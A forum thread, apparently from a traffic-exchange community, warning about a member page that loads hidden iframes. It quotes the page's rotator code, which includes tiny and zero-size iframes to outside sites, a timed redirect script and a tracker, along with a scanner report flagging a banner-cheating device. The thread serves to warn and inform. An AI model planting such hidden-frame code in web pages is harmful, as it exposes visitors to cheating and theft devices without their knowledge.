http:\\24hr-surf.com/mail/member/ptp.asp?ref=

was explicit text porn last week and has now upgraded to nasties

found in source code of the ptp page;

<iframe height="720" width="760" src="http:\\10-n.cn/ptp.php?refid=412158004"></iframe>
</td>

which is their rotator frame. 2 mvent results;

1 hidden Iframe was detected!
This was at: http:\\10-n.cn/ptp.php?refid=412158004
Here are the destination URL's detected (showing 1 to 1):
http:\\10-n.cn/ad.html (3x150)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Instances of dangerous Iframe codes were detected.
This was at: http:\\10-n.cn/ad.html

Cheating Banner Ad Codes (1):
Free20.com: 0
Neoffic.com: 1
CpaBet.com: 0
Free-mass.com: 0
Clixrevenue.com: 0
Revenuestone.com: 0
Iframemoney.info: 0

Viral Iframes (0, will be intercepted):
DoggyStyles.net: 0
Stelaartois.ru: 0
DodgeNitro.com: 0
Adventureboats.co.nz: 0

rotator iframe code;

<iframe src=http:\\10-n.cn/ad.html width=3 heigth=3><center><font size=3 color=red>412158004 will get 1 credit in 5 seconds!</font>
<script language="JavaScript">
var msg = "Welcome to Join 10-n.cn,1000IP=0.5$,no ties,IP valid in 24 hours!We paid you in 24 hours!Thanks!" ;
var interval = 200
var spacelen = 100;
var space10=" ";
var seq=0;
function Helpor_net() {
len = msg.length;
window.status = msg.substring(0, seq+1);
seq++;
if ( seq >= len ) {
seq = 0;
window.status = '';
window.setTimeout("Helpor_net();", interval );
}
else
window.setTimeout("Helpor_net();", interval );
}
Helpor_net();
</script>
<script LANGUAGE="JavaScript">
var st = 5;
var od = 1;
function gocl()
{

st = st - od;
document.value = st;
//document.getElementById("test").innerHTML = st;
setTimeout("gocl()", 1000);
if (st == 0)
{
// window.location="ce.php";
document.getElementById("my").src="cpm4ad.php";
}



}
</SCRIPT>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style><body onload=gocl();>

<iframe id="my" src="" width=0 height=0>
<iframe id="my1" src="http://www.365xiqing.com" width=1024 height=700>
<iframe id="my3" src="http://www.fawaw.com/m3.htm?1001203" width=50 height=0></iframe>
<script src='http:\\s13.cnzz.com/stat.php?id=941554&web_id=941554&show=pic1' language='JavaScript' charset='gb2312'></script>

</body>

Ahh last nite I was trying to get into that 10-n.cn site but nothing would happen. I am very glad now that I couldnt get in there. Thanks Astrangemix!

Good find -- thanks for letting everyone know!

Just a little clarification on how to read mvent's detector reports: the list you've posted in the subheading of this thread ("Free20, Neoffic, CpaBet, DoggyStyles, Stelaartois & more") is a little too complete. The detector lists all of these whenever any one of them is found, and gives the number of instances of each found on the page. If you'll look again at the report you quoted, you'll see that one instance of Neoffic was found, as indicated by the number 1 beside it. The others all have 0, indicating that no instances of those were found.



It's still rotten cheating, and Neoffic is a tremendously nasty theft device. I don't mean to belittle your report -- only to help us all use the tools accurately.

no worries jlandis, I'm not the sensitive type and thanks for the clarification. I didn't know that the detector would list all associated nasties in a group and to be honest I didn't bother checking what was actually on 10-n.cn/ad.html since just seeing the list of well known urls that mvent gave I knew it wasn't a site I would want members exposed to.

Thanks for the explanation jlandis, I saw the title of this thread and really wondered how one single site could have all those nasties all at once and how astrangemix's puter was still on and allowing her to post after all those things having hit it !

Sophie

well at the risk of angering the internet gods who might decide I need a lesson in humility I don't worry too much about what I might "hit". I have a firewall, uptodate anti-virus and absolutely nothing, not even my anti-virus, is allowed to update/download without my express permission. I also have my hard drive partioned so in a worse case scenario I would probably only be looking at wasting 5/6 hours reinstalling my OS and programs.